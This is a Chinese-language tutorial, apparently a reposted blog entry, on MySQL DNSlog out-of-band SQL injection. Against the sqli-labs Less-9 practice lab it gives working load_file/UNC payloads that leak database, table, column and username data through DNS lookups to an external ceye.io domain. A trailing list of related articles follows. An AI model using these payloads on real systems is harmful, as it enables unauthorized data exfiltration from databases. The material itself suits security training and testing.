mysql dnslog_mysql-dnslog注入
@Adminxe
dnslog原理简介:
简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。
对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入。
mysql下的dnslog注入:
利用条件:secure_file_priv 不能为NULL,仅支持 Windows但不支持 Linux ,原因如下:
load_file函数在Linux下是无法用来做dnslog攻击的,因为在这里就涉及到Windows的一个小Tips——UNC路径。
UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。
因为Linux没有UNC路径这个东西,所以当MySQL处于Linux系统中的时候,是不能使用这种方式外带数据的
1.show variables like
‘%secure%’; //查看secure_file_priv的配置情况
查询当前数据库:
and load_file(concat(‘\\\\’,(select
database()),’.xtftm5.ceye.io\\sql’)) //xtftm5.ceye.io根据ceye平台给你的域名更改,\\sql是域名目录,随意即可,select database()换成sql注入payload即可
查询表名:
and load_file(concat(‘\\\\’,(select table_name from
information_schema.tables where table_schema=’security’ limit
0,1),’.xtftm5.ceye.io\\sql’))
查询列名:
and load_file(concat(‘\\\\’,(select column_name from
information_schema.columns where table_schema=’security’ and table_name=’users’
limit 0,1),’.xtftm5.ceye.io\\sql’))
查询数据:
and load_file(concat(‘\\\\’,(select username from
users limit 0,1),’.xtftm5.ceye.io\\sql’))
实战演示sqli的第九关 :
查询当前数据库名:
http://127.0.0.1/sqli/Less-9/?id=1‘ and load_file(concat(‘\\\\’,(select
database()),’.xtftm5.ceye.io\\sql’))–+
可以看到这里成返回了当前数据库的名字
查询当前数据库的第一个表名:
http://127.0.0.1/sqli/Less-9/?id=1‘ and load_file(concat(‘\\\\’,(select
table_name from information_schema.tables where table_schema=’security’ limit
0,1),’.xtftm5.ceye.io\\sql’))–+
可以看到这里成返回了第一个表的名字
查询第users表一个列名:
http://127.0.0.1/sqli/Less-9/?id=1‘ and load_file(concat(‘\\\\’,(select
column_name from information_schema.columns where table_schema=’security’ and
table_name=’users’ limit 0,1),’.xtftm5.ceye.io\\sql’))–+
可以看到这里成返回了users表第一列的名字
查询users表的username列的数据:
http://127.0.0.1/sqli/Less-9/?id=1‘ and load_file(concat(‘\\\\’,(select
username from users limit 0,1),’.xtftm5.ceye.io\\sql’))–+
可以看到这里成返回了username第一个的数据
需要注意的点:
1.查询当前用户时,因为结果中有@符号,使用dnslog注入时,需要使用hex函数进行转码,再将查询到的hex转码后的数据解码即可,如下:
http://127.0.0.1/sqli/Less-9/?id=1‘ and
load_file(concat(‘\\\\’,(select hex(user())),’.xtftm5.ceye.io\\sql’))–+
2.如果使用group_concat函数进行快读查询,也同样需要hex转码,利用如下:
http://127.0.0.1/sqli/Less-9/?id=1‘ and
load_file(concat(‘\\\\’,(select hex(group_concat(table_name)) from information_schema.tables
where table_schema=’security’),’.xtftm5.ceye.io\\sql’))–+
查询到的是hex编码的结果
利用工具hex解码一下即可
喜欢 (4)or分享 (0)
mysql dnslog_mysql-dnslog注入相关推荐
- (17)网络安全:cookie注入、二次注入、DNSlog注入、中转注入、堆叠注入的原理及注入过程
目录 cookie注入 sqli-lasb-master less-21 方法一:用burpsuite进行抓包后修改 方法二:安装火狐的cookie manager等插件进行修改cookie 第一步: ...
- php mysql 防 sql注入_php 防sql注入方法
php防sql注入的方法:1.使用mysql_real_escape_string方法转义SQL语句中使用的字符串中的特殊字符:2.打开magic_quotes_gpc来防止SQL注入:3.通过自定义 ...
- mysql注入实例获取答案_本文实例讲述了MySQL解决SQL注入的另类方法。分享给大家供大家参考,具体如下:问题解读我觉得,这个问题每年带来的成本可以高达数十亿美元了。本文就来谈谈,...
本文实例讲述了MySQL解决SQL注入的另类方法.分享给大家供大家参考,具体如下: 问题解读 我觉得,这个问题每年带来的成本可以高达数十亿美元了.本文就来谈谈,假定我们有如下 SQL 模板语句: se ...
- 雷林鹏分享:MySQL 及 SQL 注入
MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题. 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入 ...
- 三十一、MySQL 及 SQL 注入
MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题. 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入 ...
- mysql 8.0 自定义函数_PHP+Mysql防止SQL注入的方法(life)
这篇文章介绍的内容是关于PHP+Mysql防止SQL注入的方法,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下 我的官方群点击此处. 方法一: mysql_real_escape_str ...
- phpcms mysql 事务_phpcms某站点MySQL报错注入
phpcms某站点MySQL报错注入 Referer可注入:GET /index.php HTTP/1.1Referer: 123*User-Agent: Mozilla/5.0 (iPhone; C ...
- 遭遇一次MySQL猜解注入攻击
遭遇一次MySQL猜解注入攻击 前些日子数据库被入侵,文章的阅读数都被纂改了,还好及时发现并做好备份.查一下 MySQL 语句记录,发现这么原来是这么一句 SQL 在捣鬼: 1 UPDATE tabl ...
- mysql union as 注入_sql注入入门 之 mysql 常规注入 [ union方式 ]
1,常规数字型 mysql 实例注入点,如下:1https://www.vuln.com/md_materia_profile_view.php?viewid=2 2,依旧先尝试下经典的单引号,如下, ...
- mysql 防注入 php_PHP+mysql防止SQL注入的方法小结
本文实例讲述了PHP+mysql防止SQL注入的方法.分享给大家供大家参考,具体如下: SQL注入 例:脚本逻辑 $sql = "SELECT * FROM user WHERE useri ...
最新文章
- Ubuntu 安装 Etcd
- tensorflow 模型压缩
- 单元测试01:nunit 安装与代码测试
- python账号密码一一对应_python模拟用户登录系统,如何两个用户输入各自的密码才能登入?...
- c语言goto语句用法_C语言32个关键字9种控制语句34种运算符整理
- 使用pip安装包提示TLS证书错误解决办法
- (转)Geoserver基础配图研究
- 计算机技术学 试卷,计算机技术及科学技术学院试卷模板A.doc
- Delphi窗体显示Echarts图表
- 微软牛津计划介绍——屌爆了的自然数据处理解决方案(人脸/语音识别,计算机视觉与语言理解)
- 二叉树层次遍历c语言_LeetCode 树 107.二叉树的层次遍历Ⅱ
- netty 百度网盘 密码
- java 最大子段和问题,最大连续子数组和(最大子段和)
- mysql 技术内幕 的示例数据库
- 深入理解Magento第五章 – Magento资源配置
- 网站建设就是要大胆创新
- WES2009创建开发
- html a href 文件下载 IE直接打开 内容乱码
- 未来计算机更加智能化,未来计算机的发展趋势
- 微信的账号连接服务器失败怎么回事,微信无法连接到服务器的原因和6个解决方法...
热门文章
- 速度=价值,金融行业对华为云CDN的极致喜爱
- ubuntu18.04 如何设置固定IP
- css用浮动的方法让div在同一行
- 学习笔记_王隆杰_VMware Horizon View 6.0桌面虚拟化与应用虚拟化
- Java开发--页面无法显示
- Xournal-条记抄写软件
- 1分钟学会在OneNote中插入代码块(不需要任何插件或软件直接插入像CSDN中一样的代码块)
- Wio RP2040无线WiFi迷你开发板Arduino IDE开发环境安装与使用基础
- 微信小程序表单数据提交服务器,微信小程序-form表单提交
- 【实验室服务器记载】